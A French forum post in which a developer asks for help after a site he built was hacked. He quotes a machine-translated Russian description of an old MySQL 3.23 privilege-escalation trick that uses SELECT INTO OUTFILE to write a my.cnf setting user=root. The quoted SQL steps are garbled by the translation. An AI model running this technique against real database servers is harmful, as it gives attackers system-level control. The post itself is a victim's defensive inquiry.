J'ai réalisé le site www.lana-france.com et ses inscriptions en php/mysql puis il a migré vers un autre hébergeur et ce matin, on l'a retrouvé hacké par un groupe russe (les gips) :
www.lana-france.com/index1.php
Voilà l'aproximative traduction de systran (du russe à l'anglais) :
Citation :
Zapuskayem MySQL under root
This is what made Gufino on MySQL 3.23.55
It entered as root and made following:
Mysql>.cREATE DATABASE Roottext;
mysql>.USE roottext;
Mysql>.cREATE TABLE Hack (conf VARCHAR(80));
Mysql>.INSERT IN Hack VALUES (' [ mysqld ] ';
Mysql>.INSERT IN Hack VALUES ("user=.root ';
mysql>.SELEccT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf ' FROM hack
mysql>.QUIT
By this was created file my.cnf in the directory of the data mysql of the following content:
[ mysqld ]
user=.root
Now, if we perezapustit' server mysql the selection of user in my.cnf it wakes it had an advantage over the analogous into /.etch/my.chnf and mysql wakes it worked with rights root, with all consequences for the safety...
This is very dangerous, since in mysql to version 3.23.53 inclusively very simply were obtained rights root with the aid of known eksploita...
|
Evidemment, je souhaiterai que ça ne puisse plus se reproduire à nouveau et j'aimerai savoir, ou plutôt comprendre comment ça s'est produit, juste le "il s'est loggé en root" déjà, je l'explique pas vraiment.
Merci pour votre aide